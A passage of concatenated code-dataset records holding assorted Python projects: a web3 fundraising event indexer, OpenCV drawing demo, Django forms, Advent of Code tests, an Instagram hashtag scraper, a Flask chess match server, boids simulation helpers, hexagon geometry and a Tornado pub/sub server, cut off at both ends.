web3.eth.get_block(block_number)[\"timestamp\"]\n event_instance = Event.objects.get(id=event_id)\n donor_profile, created = UserProfile.objects.get_or_create(wallet_address=donor_address)\n Donation.objects.create(\n donor=donor_profile,\n amount=Decimal(amount),\n event=event_instance,\n timestamp=datetime.datetime.fromtimestamp(timestamp),\n message=message\n )\n # Updating the collected_amount of the related Event\n event_instance.collected_amount += Decimal(amount)\n event_instance.save()\n\n except Exception as e:\n print(e)\n\ndef handle_fund_released_to_creator_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n fund_released_to_creator_events = contract.events.FundReleasedToCreator().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in fund_released_to_creator_events:\n event_id = event['args']['eventId']\n amount = Decimal(event['args']['creatorShare'])\n creator_address = event['args']['creator']\n\n event_instance = Event.objects.get(id=event_id)\n creator_profile = UserProfile.objects.get(wallet_address=creator_address)\n\n FundRelease.objects.create(\n event=event_instance,\n amount=amount,\n release_type='Creator',\n recipient=creator_profile\n )\n\n\ndef handle_fund_released_to_validators_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n fund_released_to_validators = contract.events.FundReleasedToValidators().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in fund_released_to_validators:\n event_id = event['args']['eventId']\n amount = Decimal(event['args']['validatorShare'])\n validator_address = event['args']['validator']\n\n validator_profile = UserProfile.objects.get(wallet_address=validator_address)\n event_instance = Event.objects.get(id=event_id)\n FundRelease.objects.create(\n event=event_instance,\n amount=amount,\n release_type='Validator',\n recipient=validator_profile\n )\n\n\ndef handle_fund_released_to_platform_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n fund_released_to_platform_events = contract.events.FundReleasedToPlatform().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in fund_released_to_platform_events:\n event_id = event['args']['eventId']\n amount = Decimal(event['args']['platformShare'])\n platform_address = event['args']['platform']\n\n platform_profile = UserProfile.objects.get(wallet_address=platform_address)\n event_instance = Event.objects.get(id=event_id)\n FundRelease.objects.create(\n event=event_instance,\n amount=amount,\n release_type='Platform',\n recipient=platform_profile\n )\n","repo_name":"cultchain-com/backend","sub_path":"indexer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39816417987","text":"import cv2\nimport numpy as np\n\nimg = np.zeros((512, 512, 3), np.uint8)\n# print(img.shape)\n# img[:] = 255,0,0\n\n# =================\n# SHAPES ON IMAGES\n# =================\n\n# The 1st arg is the image, 2nd is the Starting Point, 3rd is the Ending Point, 4th is the Color, & 5th is the\n# Thickness\ncv2.line(img, (0,0), (img.shape[1], img.shape[0]), (0, 255, 0), 3)\ncv2.rectangle(img, (0,0), (250, 350), (0, 0, 255), 2)\ncv2.circle(img, (400, 50), 30, (255, 255, 0), 5)\n\n# ==============\n# TEXT ON SHAPES\n# ==============\n\n# The 1st arg is the image, 2nd is the text, 3rd is the Starting Point, 4th is the Font Style, 5th is the Scale,\n# 6th is the Color, 7th is the Thickness\ncv2.putText(img, \" OPENCV \", (300, 200), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 150, 0), 3)\n\ncv2.imshow(\"Image\", img)\ncv2.waitKey(0)","repo_name":"Elemento24/OpenCV-Computer-Vision-Basics","sub_path":"chapter4.py","file_name":"chapter4.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27232347668","text":"\nfrom django.contrib.auth.models import User\nfrom django import forms\nfrom BarApp.models import *\nfrom operator import itemgetter\n\ndef get_users():\n \"\"\"get_users()\n Returns sorted list for all users which are in Saldo table\n :return: _description_\n \"\"\"\n return sorted([(i.id,i.username) for i in User.objects.filter(id__in=Saldo.objects.values_list('user_id'))],key=itemgetter(1))\n\nclass AddMoney(forms.Form):\n \"\"\"Add Money to saldo\n Form which allows users to deposit money.\n :param forms: _description_\n \"\"\"\n amount = forms.DecimalField(label=\"Hoeveel geld wil je storten:\",max_digits=5, decimal_places=2)\n user = forms.ModelChoiceField(label=\"Bij wie moet dit op de rekening:\",queryset=User.objects.filter(id__in=Saldo.objects.values_list('user_id',flat=True)).order_by(\"username\"))\n \nclass OrderDrink(forms.Form):\n \"\"\"OrderDrink form which is list of checkboxes which one for each user.\n\n :param forms: _description_\n \"\"\"\n user = forms.MultipleChoiceField(\n choices = get_users,\n widget = forms.CheckboxSelectMultiple,\n )\n \nclass AddDrink(forms.ModelForm):\n \"\"\"ModelForm AddDrink\n Bases on the Drankjes tabel\n Supplies all field except date and Time\n :param forms: _description_\n \"\"\"\n class Meta:\n model = Drankjes\n fields = [\"naam\",\"prijs\",\"description\",\"img\",\"ratio\"]\n labels = {\n \"img\": \"Afbeelding (Optioneel)\",\n \"description\": \"Omschrijving (Optioneel)\"\n }\n widgets = {\n 'description': forms.Textarea,\n }\n \nclass UpdateDrink(forms.Form):\n \"\"\"UpdateDrink\n Form which allows users to select one of all drinks\n :param forms: _description_\n \"\"\"\n drink = forms.ModelChoiceField(label=\"Welk drankje wil je aanpassen?\",queryset=Drankjes.objects.all())\nclass UpdateDrinkModel(forms.ModelForm):\n \"\"\"Model based on Drankjes \n Form which allows users to update drinks\n\n :param forms: _description_\n \"\"\"\n class Meta:\n model = Drankjes\n fields = [\"naam\",\"prijs\",\"description\",\"active\",\"img\",\"ratio\"]\n labels = {\n \"img\": \"Afbeelding (Optioneel)\",\n \"description\": \"Omschrijving (Optioneel)\",\n \"active\": \"Is het drankje te koop?\"\n }\n widgets = {\n 'description': forms.Textarea,\n }\nclass DeleteDrink(forms.Form):\n \"\"\"DeleteDrink\n Drinkselector form for drink deletion\n\n :param forms: _description_\n \"\"\"\n drink = forms.ModelChoiceField(label=\"Welk drankje wil je verwijderen\",queryset=Drankjes.objects.all())\n \nclass DateInput(forms.DateInput):\n \"\"\"Form to supply date\n\n :param forms: _description_\n \"\"\"\n input_type = 'date'\n\n\nclass UserStortingLog(forms.Form):\n \"\"\"Form which allows users to enter \n two users and date\n Used for Storting log\n :param forms: _description_\n \"\"\"\n usr = forms.ModelChoiceField(label=\"Saldo van:\",queryset=User.objects.filter(id__in=Saldo.objects.values_list('user_id',flat=True)).order_by(\"username\"),required=False)\n exe = forms.ModelChoiceField(label=\"Uitgevoerd door\",queryset=User.objects.all(),required=False)\n dT = forms.DateField(label=\"Datum\",widget=DateInput,required=False)\n \nclass UserSaldoLog(forms.Form):\n \"\"\"Form which allows users to select user for SaldoLog\n\n :param forms: _description_\n \"\"\"\n usr = forms.ModelChoiceField(label=\"Saldo van:\",queryset=User.objects.filter(id__in=Saldo.objects.values_list('user_id',flat=True)).order_by(\"username\"),required=False,empty_label=\"Alle gebruikers\")\n\nclass DateDrinkLog(forms.Form):\n \"\"\"Allows users to select date for DrinkLog\n :param forms: _description_\n \"\"\"\n dT = forms.DateField(label=\"Datum (Leeg laten voor alles)\",widget=DateInput,required=False)\n \n \n \n \n\n \n\n","repo_name":"Timmerman73/ssl_bar","sub_path":"BarApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9976040703","text":"from unittest import TestCase\nfrom unittest.case import skip\n\nfrom ..util import get_resource\n\nDAY=\"14\"\n\nfrom advent.day_14.polymers import *\n\nEXAMPLE_INPUT = \"\"\"\\\nNNCB\n\nCH -> B\nHH -> N\nCB -> H\nNH -> C\nHB -> C\nHC -> B\nHN -> C\nNN -> C\nBH -> H\nNC -> B\nNB -> B\nBN -> B\nBB -> N\nBC -> B\nCC -> N\nCN -> C\n\"\"\"\n\nclass TestThing(TestCase):\n\n def test_example_1(self):\n lines = EXAMPLE_INPUT.splitlines()\n poly = make_chain(lines[0])\n rules = make_rules(lines[2:])\n step_1 = get_next_poly(poly, rules)\n\n expected = \"NCNBCHB\"\n actual = str(step_1)\n self.assertEqual(expected, actual)\n\n expected = \"NBCCNBBBCBHCB\"\n self.assertEqual(expected, str(get_next_poly(poly, rules)))\n\n self.assertEqual(1588, answer_1(lines))\n self.assertEqual(1588, answer_2(lines))\n\n def test_example_2(self):\n lines = EXAMPLE_INPUT.splitlines()\n expected = 2188189693529\n actual = answer_2(lines, 40)\n self.assertEqual(expected, actual)\n\n def test_answer_1(self):\n lines = get_resource(f'day_{DAY}/input.txt').read_text().splitlines()\n answer = answer_1(lines)\n print(f'\\nAnswer 1 : {answer}\\n')\n expected = 2027\n self.assertEqual(expected, answer)\n self.assertEqual(expected, answer_2(lines))\n\n def test_answer_2(self):\n lines = get_resource(f'day_{DAY}/input.txt').read_text().splitlines()\n answer = answer_2(lines, 40)\n print(f'\\nAnswer 2 : {answer}\\n')\n # expected =\n # self.assertEqual(expected, answer)\n\n","repo_name":"awilkins/advent","sub_path":"python/tests/day_14/test_polymers.py","file_name":"test_polymers.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28755727096","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: Xiaoyin\n'''\n'''\n输入数字n, 按顺序打印从1最大的n位十进制数\n比如输入3, 则打印出1、2、3、到最大的3位数即999\npython整型不会溢出!!int到32位自动转成Long\n'''\n\ndef Print(n):\n if n == 0:\n return 0\n for i in range(1,10**n):\n print(i)\n\nPrint(3)\n","repo_name":"Xiaoyin96/Algorithms_Python","sub_path":"interview_practice/66Questions/17.PrintMaxN.py","file_name":"17.PrintMaxN.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16971824327","text":"import requests\nimport time\nimport json\nimport re\nfrom pymongo import MongoClient, GEOSPHERE\nimport pandas as pd\nimport datetime\nimport progressbar\nfrom geopy.geocoders import Nominatim\nfrom geopy.extra.rate_limiter import RateLimiter\nfrom functools import partial\nfrom shapely.geometry import mapping\n\n\ndef format_data(data):\n data = data['graphql']['shortcode_media']\n data['taken_at_timestamp'] = datetime.datetime.fromtimestamp(\n int(data['taken_at_timestamp']))\n return data\n\n\ndef format_location(data, geolocator):\n dt = json.loads(data['location']['address_json'])\n geocode = partial(geolocator.geocode,\n country_codes=dt['country_code'], geometry='geojson')\n loc = geocode(query=dt[\"city_name\"])\n data['geometry'] = loc.raw['geojson']\n data['nominatin'] = loc.raw\n data['latitude'] = loc.latitude\n data['longitude'] = loc.longitude\n time.sleep(1.1)\n return data\n\n\nwith open('./conf.json', 'r') as f:\n conf = json.load(f)\n\ngeolocator = Nominatim(user_agent=\"pablo.coellopulido@usc.es\")\nend_cursor = conf['end_cursor']\n\nif re.search(' ', conf['database']) is None and len(conf['database']) < 20:\n if re.search(' ', conf['collection']) is None and len(conf['collection']) < 20:\n\n client = MongoClient('localhost', 27017)\n db = eval('client.' + conf['database'])\n collection = eval('db.' + conf['collection'])\n collection.create_index([(\"geometry\", GEOSPHERE)])\n else:\n print('invalid collection name')\nelse:\n print('invalid database name')\n\n\nfor i in progressbar.progressbar(range(0, conf['page_count'])):\n arr = []\n url = \"https://www.instagram.com/explore/tags/{0}/?__a=1&max_id={1}\".format(\n conf['tag'], end_cursor)\n r = requests.get(url)\n data = json.loads(r.text)\n\n # value for the next page\n end_cursor = data['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']\n # list with posts\n edges = data['graphql']['hashtag']['edge_hashtag_to_media']['edges']\n\n time.sleep(2) # insurence to not reach a time limit\n\n if len(edges) > 0:\n for item in edges:\n arr.append(item['node'])\n\n for item in arr:\n shortcode = item['shortcode']\n url = \"https://www.instagram.com/p/{0}/?__a=1\".format(shortcode)\n\n r = requests.get(url)\n try:\n data = json.loads(r.text)\n data = format_data(data)\n if len(data['location']['address_json']) > 0:\n data = format_location(data, geolocator)\n collection.insert_one(data)\n except:\n pass\nclient.close()\n\n\nconf['end_cursor'] = end_cursor\nwith open('conf.json', 'w') as outfile:\n json.dump(conf, outfile)\n","repo_name":"PabloCoello/santiago-recreation","sub_path":"instagram_scrapp.py","file_name":"instagram_scrapp.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"834812763","text":"import json\nimport time\nimport datetime\n\nfrom flask import Blueprint\nfrom flask import request\nfrom flask import jsonify\nfrom flask import session\nfrom flask import redirect\nfrom flask import url_for\nfrom flask import render_template\nfrom flask import Response\nfrom flask import stream_with_context\nfrom flask_login import current_user\n\nfrom . import forms\nfrom app.svc.match.msg_handler_c2s import handle_c2s\nfrom app.svc.match.msg_handler_s2c import handle_s2c, force_to_stop\nfrom app.svc.match.msg_meta import MSG_TYPE_NOP\nfrom app.svc.match import exceptions\n\nfrom app.svc.membership import driver as membership_driver\nfrom app.svc.match import driver as match_driver\nfrom config import settings\n\nbp = Blueprint(__name__.split('.')[2], __name__)\n\n\n@bp.route('join_private_match', methods=['POST'])\ndef join_private_match():\n form = forms.JoinPrivateMatchForm()\n if not form.validate_on_submit():\n return 'error 1'\n match = match_driver.join_match(\n current_user.user_id, form.join_token.data)\n if not match:\n return 'error 2'\n return redirect(url_for('match.view_match'))\n\n\n@bp.route('join_public_match', methods=['POST'])\ndef join_public_match():\n form = forms.JoinPublicMatchForm()\n if not form.validate_on_submit():\n return 'error 1'\n match = match_driver.join_match(\n current_user.user_id, None)\n if not match:\n return 'error 2'\n return redirect(url_for('match.view_match'))\n\n\n@bp.route('view_match')\ndef view_match():\n try:\n match = match_driver.get_match(current_user.user_id)\n except exceptions.NoMatchFoundException:\n return redirect(url_for('site.index'))\n match_msg_form = forms.MessageForm()\n return render_template('site/play.html', match=match,\n OFFLINE_TTL=settings.OFFLINE_TTL,\n match_msg_form=match_msg_form)\n\n\n@bp.route('receive_match_message')\ndef receive_match_message():\n def yield_message():\n last_valid_msg_time = datetime.datetime.now()\n while True:\n rval = handle_s2c()\n if rval is None:\n break\n print(rval['msg_type'])\n if rval['msg_type'] != MSG_TYPE_NOP:\n last_valid_msg_time = datetime.datetime.now()\n yield 'data: {}\\n\\n'.format(json.dumps(rval))\n else:\n now = datetime.datetime.now()\n delta = (now - last_valid_msg_time).seconds\n if delta > settings.OFFLINE_TTL:\n # offline too long. force match to stop\n force_to_stop()\n break\n if delta > 5:\n yield 'data: {}\\n\\n'.format(json.dumps(rval))\n time.sleep(0.5)\n return Response(stream_with_context(yield_message()),\n mimetype='text/event-stream')\n\n\n@bp.route('send_match_message', methods=['POST'])\ndef send_match_message():\n form = forms.MessageForm()\n if not form.validate():\n return 'error'\n message = {\n 'msg_type': form.msg_type.data,\n 'msg_data': form.msg_data.data\n }\n return jsonify(handle_c2s(message))\n","repo_name":"kaiwensun/ChessPy","sub_path":"app/views/match/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18597687141","text":"import math\n\n\ndef distance(point_one, point_two):\n return ((point_one[0] - point_two[0]) ** 2 + (point_one[1] - point_two[1]) ** 2) ** 0.5\n\n\ndef within(point, square, sides):\n return square[0] <= point[0] <= square[0] + sides and square[1] <= point[1] <= square[1] + sides\n\n\ndef plot_centers(radius, screensize):\n centers = []\n for x in range(round(screensize[0] / (radius * math.cos(math.radians(30))))):\n for y in range(round(screensize[1] / (radius + (math.sin(math.radians(30)))))):\n if y % 2 == 0:\n centers.append(\n (round((radius * math.cos(math.radians(30))) + (x * 2 * (radius * math.cos(math.radians(30))))),\n round(radius + (y * (radius + (radius * math.sin(math.radians(30))))))))\n elif y % 2 == 1:\n centers.append(((x * 2 * (radius * math.cos(math.radians(30)))),\n radius + (y * (radius + (radius * math.sin(math.radians(30)))))))\n return centers\n\n\ndef plot_vertices(centers, radius):\n # Plots vertices clockwise starting at 12 o'clock\n points = []\n for center in centers:\n vertices = []\n for i in range(6):\n degrees = (i * 60) - 90\n vertices.append(((center[0]) + (radius * math.cos(math.radians(degrees))),\n (center[1]) + (radius * math.sin(math.radians(degrees)))))\n points.append(vertices)\n\n return points\n\n\ndef get_lines(points):\n lines = []\n for hexagon in points:\n hex_lines = []\n for i in range(len(hexagon)):\n if i <= (len(hexagon) - 2):\n hex_lines.append((hexagon[i], hexagon[i + 1]))\n else:\n hex_lines.append((hexagon[i], hexagon[0]))\n\n lines.append(hex_lines)\n\n return lines\n\ndef find_inside(circle, radius, square, sides, centers):\n inside = []\n for point in centers:\n if distance(point, circle) <= radius or within(point, square, sides):\n inside.append(point)\n return inside\n\n\ndef get_area(centers, radius):\n return centers * (6 * (radius ** 2 * ((3 ** 0.5) / 4)))\n","repo_name":"Juamops/A-Cool-Math-Project","sub_path":"Hex_Mesh.py","file_name":"Hex_Mesh.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33147937423","text":"import numpy as np\nfrom numba import jit, njit\n#%%\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef clip_magnitude(array, low, high): # To make everything stay in allowed range\n \"\"\"\n Initializes position and speed of agents in the allowed range.\n\n Parameters\n ----------\n array: array_like.\n A two-dimensional array with some kind of data.\n\n low: float.\n The lowest parameter allowed.\n\n high: float.\n The highest parameter allowed.\n\n Returns\n -------\n : array_like.\n Modified input array without zeros and with parameters in the acceptable range.\n \"\"\"\n magnitudes = np.linalg.norm(array.T, axis=0)\n no_zeros = np.abs(magnitudes) > 0\n clipped = np.clip(magnitudes, low, high)\n return clipped[no_zeros, None] * array[no_zeros] / magnitudes[no_zeros, None]\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef boids_initialization(boids, aspect, velocity_range):\n \"\"\"\n Initializes position and speed of agents in the allowed area.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n aspect: float.\n Represents the configuration of walls and video format.\n\n velocity_range: array_like.\n An array representing lowest and highest speed for each agent.\n\n Returns\n -------\n None.\n \"\"\"\n number = boids.shape[0]\n rng = np.random.default_rng(seed=None)\n boids[:, 0] = rng.uniform(0., aspect, size=number) # Setting the coordinates\n boids[:, 1] = rng.uniform(0., 1., size=number)\n velocity = rng.uniform(velocity_range[0], velocity_range[1], size=number) # Create random speed for each agent\n angle = rng.uniform(0, 2*np.pi, size=number) # And random angle for each agent\n boids[:, 2] = velocity * np.cos(angle) # Setting the projections of speeds\n boids[:, 3] = velocity * np.sin(angle)\n\n\n@njit(cache=True, parallel=True)\ndef directions(boids):\n \"\"\"\n Calculates the directions of moving agents on the screen.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n Returns\n -------\n : array_like.\n\n \"\"\"\n return np.hstack((boids[:, :2] - boids[:, 2:4], boids[:, :2]))\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef movement(boids, dt, velocity_range):\n \"\"\"\n Computes movement of agents and sets their speeds.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n dt: float.\n Represents time step in evaluation.\n\n velocity_range: array_like.\n An array representing lowest and highest speed for each agent.\n\n Returns\n -------\n None.\n \"\"\"\n boids[:, :2] += dt*boids[:, 2:4] + 0.5 * dt**2 * boids[:, 4:6] # Coordinates\n boids[:, 2:4] += dt*boids[:, 4:6] # Speed\n boids[:, 2:4] = clip_magnitude(boids[:, 2:4], velocity_range[0], velocity_range[1])\n\n\n@jit(cache=True, forceobj=True)\ndef jail(boids, aspect):\n \"\"\"\n Makes agents stay between the walls. If agent passes the wall, it appears from the opposite side.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n aspect: float.\n Represents the configuration of walls and video format.\n\n Returns\n -------\n None.\n \"\"\"\n boids[:, :2] %= np.array([aspect, 1.])\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef neighbours_detection(distance_matrix, threshold):\n \"\"\"\n Makes agents stay between the walls. If agent passes the wall, it appears from the opposite side.\n\n Parameters\n ----------\n distance_matrix: array_like.\n Array with information about positions of the nearest agents (neighbours) regarding this agent.\n\n threshold: float.\n Represents the scope of the neighbors by the agent.\n\n Returns\n -------\n neighbours: array_like.\n An array with information about neighbours in the field of view.\n \"\"\"\n neighbours = distance_matrix < threshold\n np.fill_diagonal(neighbours, False)\n return neighbours\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef cohesion(boids, i, indexes):\n \"\"\"\n Describes behaviour when moving towards the average position of local flock mates.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n i: int.\n Represents index of the actual considered agent.\n\n indexes: array_like.\n Represent indexes of neighbours of considered agent.\n\n Returns\n -------\n : array_like.\n The acceleration for i-th agent to move to the flock mates.\n \"\"\"\n return boids[indexes, :2].mean(axis=0) - boids[i, :2]\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef separation(boids, i, indexes, distances):\n \"\"\"\n Describes behaviour when avoiding crowding local flock mates.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n i: int.\n Represents index of the actual considered agent.\n\n indexes: array_like.\n Represent indexes of neighbours of considered agent.\n\n distances: array_like.\n Array with information about positions of the neighbours regarding this agent.\n\n Returns\n -------\n : array_like.\n The acceleration for i-th agent to avoid crowding.\n \"\"\"\n return np.sum((boids[i, :2] - boids[indexes, :2]) / distances[i, indexes, None], axis=0)\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef alignment(boids, i, indexes):\n \"\"\"\n Describes behaviour when steering towards the average heading of local flock mates.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n i: int.\n Represents index of the actual considered agent.\n\n indexes: array_like.\n Represent indexes of neighbours of considered agent.\n\n Returns\n -------\n : array_like.\n The acceleration for i-th agent to align with the nearest cluster of neighbours.\n \"\"\"\n return boids[indexes, 2:4].mean(axis=0) - boids[i, 2:4]\n\n\n@njit(cache=True, parallel=True)\ndef avoid_walls(boids, aspect):\n \"\"\"\n Calculates the power of the influence of walls on agents. Also, I added one more wall in the middle.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n aspect: float.\n Represents the configuration of walls and video format.\n\n Returns\n -------\n : array_like.\n Accelerations that gave the power of the walls' influence.\n \"\"\"\n left_wall = np.abs(boids[:, 0])\n right_wall = np.abs(aspect - boids[:, 0])\n middle_wall = 1./2.\n upper_part = boids[:, 1] > middle_wall\n floor = np.zeros(boids.shape[0], dtype=boids.dtype)\n sail = np.zeros(boids.shape[0], dtype=boids.dtype)\n floor[upper_part] = np.abs(boids[upper_part, 1] - middle_wall)\n floor[~upper_part] = np.abs(boids[~upper_part, 1])\n sail[upper_part] = np.abs(1 - boids[upper_part, 1])\n sail[~upper_part] = np.abs(middle_wall - boids[~upper_part, 1])\n horizontal_acceleration = np.subtract(1. / left_wall**3, 1. / right_wall**3) # I made walls influence a little\n vertical_acceleration = np.subtract(1. / floor**3, 1. / sail**3) # smaller to furthest and bigger for nearest.\n return np.column_stack((horizontal_acceleration, vertical_acceleration))\n\n\n@njit(cache=True, fastmath=True, parallel=True)\ndef noise(boids):\n \"\"\"\n Creates noise to influence agents.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n Returns\n -------\n : float.\n Acceleration obtained by noise power.\n \"\"\"\n return np.random.rand(boids.shape[0], 2) ** 2 - 0.1 # Noise influence might be more random\n","repo_name":"prometneus/Python-in-practical-problems","sub_path":"flocking simulation/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40231667907","text":"import socket\nimport time\ntry:\n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n tup = (\"localhost\",5000)\n time.sleep(20)\n s.sendto(b\"Hello Client \",tup)\n msg = \"Bye\"\n s.sendto(msg.encode(),tup)\nexcept Exception as ex:\n print(ex)\ns.close()\n","repo_name":"nikunjjoshi04/MovieLens","sub_path":"cn/UDPSERVER.py","file_name":"UDPSERVER.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13653744300","text":"import socket\nfrom tornado import ioloop, iostream\nimport tornado.options\nfrom tornado.options import define, options\nfrom time import time\nfrom collections import deque, namedtuple\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\n# simple server for pub / sub text transmission\n\n\nclass Room():\n \"\"\"\n A room is a collection of streams which subscribe to the room\n any text sent to the room is sent out to the people listening\n in the room\n \"\"\"\n\n def __init__(self,name):\n log.debug('adding room: %s' % name)\n\n self.name = name\n\n self.streams = []\n\n def add_stream(self,stream):\n \"\"\"\n adds a new stream for listening in this room\n \"\"\"\n log.debug('%s: adding stream' % self.name)\n\n if stream not in self.streams:\n self.streams.append(stream)\n\n def remove_stream(self,stream):\n \"\"\"\n removes a stream from the room\n \"\"\"\n\n log.debug('%s: removing stream' % self.name)\n\n try:\n self.streams.remove(stream)\n except IndexError:\n return False\n\n return True\n\n def send_message(self,message,sender_stream):\n \"\"\"\n relays the message to all streams listening\n for messages in this room\n \"\"\"\n\n log.debug('%s: sending message %s' % (self.name,message))\n\n # relay the message to the streams\n for stream in self.streams:\n # don't want to broadcast back to sender\n if stream is sender_stream:\n continue\n stream.write(message)\n stream.write('\\r\\n\\r\\n')\n\n\nclass House():\n \"\"\"\n collects rooms\n \"\"\"\n\n def __init__(self):\n self.rooms = {}\n\n def get(self, name):\n \"\"\"\n returns the room who's name u passed\n creates it if it doesn't exist yet\n \"\"\"\n\n if not name in self.rooms:\n log.debug('adding new room: %s' % name)\n room = Room(name)\n self.rooms[name] = room\n else:\n room = self.rooms.get(name)\n\n return room\n\n\nclass Handler():\n \"\"\"\n handles connections, adds / removes\n them from rooms, notifies rooms of new messages\n \"\"\"\n\n def __init__(self,stream,house):\n self.stream = stream\n self.house = house\n\n self.listening_rooms = []\n\n def __call__(self,data):\n \"\"\" socket receives more data \"\"\"\n\n # parse the args they sent us\n args = self.parse_args(data)\n\n log.debug('args: %s' % args)\n\n # see if they want to add any rooms\n if 'add-room' in args:\n log.debug('found add room in args')\n self.add_rooms(args.get('add-room').split(','))\n\n # remove from a room?\n if 'remove-room' in args:\n log.debug('found remove room in args')\n self.remove_rooms(args.get('remove_room').split(','))\n\n # if they have broadcast in there, they want to send a message\n # to some rooms\n if 'broadcast' in args:\n log.debug('found broadcast in args')\n\n # if they specify rooms, pull them, we don't have to\n # be a subscriber to braodcast to a room\n if 'room' in args:\n log.debug('found room in args: %s' % args.get('room'))\n\n rooms = []\n for name in args.get('room').split(','):\n room = self.house.get(name)\n if room:\n rooms.append(room)\n\n # if no rooms are specified, all rooms they listen to\n else:\n rooms = self.listening_rooms\n\n # they want to broadcast a message\n for room in rooms:\n room.send_message(args.get('message'),self.stream)\n\n self.done()\n\n def done(self):\n self.stream.write('DONE\\r\\n\\r\\n')\n self.stream.read_until('\\r\\n\\r\\n',self)\n \n def add_rooms(self,room_names):\n \"\"\"\n adds listeners to specified rooms, by name\n \"\"\"\n\n log.debug('adding rooms: %s' % room_names)\n\n # pull the room for each name\n for name in room_names:\n room = self.house.get(name)\n\n # add our stream as a listener\n room.add_stream(self.stream)\n\n # note we are listening\n self.listening_rooms.append(room)\n\n def remove_rooms(self,room_names):\n \"\"\"\n removes our listener from rooms by name\n \"\"\"\n\n log.debug('removing rooms: %s' % room_names)\n\n # pull the rooms\n for name in room_names:\n room = self.house.get(name)\n\n # remove our stream as a listener\n room.remove_stream(self.stream)\n\n # note we are listening\n self.listening_rooms.remove(room)\n\n def parse_args(self,data):\n # args are supposed to be k:v\\n\n # we should get k/v pairs\n # one per line ':' seperated\n args = {}\n for line in data.split('\\r\\n'):\n parts = [x.strip() for x in line.split(':',1)]\n if len(parts) == 2:\n args[parts[0].lower()] = parts[1]\n return args\n\n\nclass Server():\n \n def handle_accept(self, fd, events):\n log.debug('accepting')\n\n conn, addr = self._sock.accept()\n stream = iostream.IOStream(conn)\n handler = Handler(stream,self.house)\n stream.read_until('\\r\\n\\r\\n',handler)\n\n def start(self, host, port):\n # let those listening know we are about to begin\n\n log.debug('plugin server starting: %s %s'\n % (host,port))\n\n # startup our room collection\n self.house = House()\n\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n self._sock.setblocking(0)\n 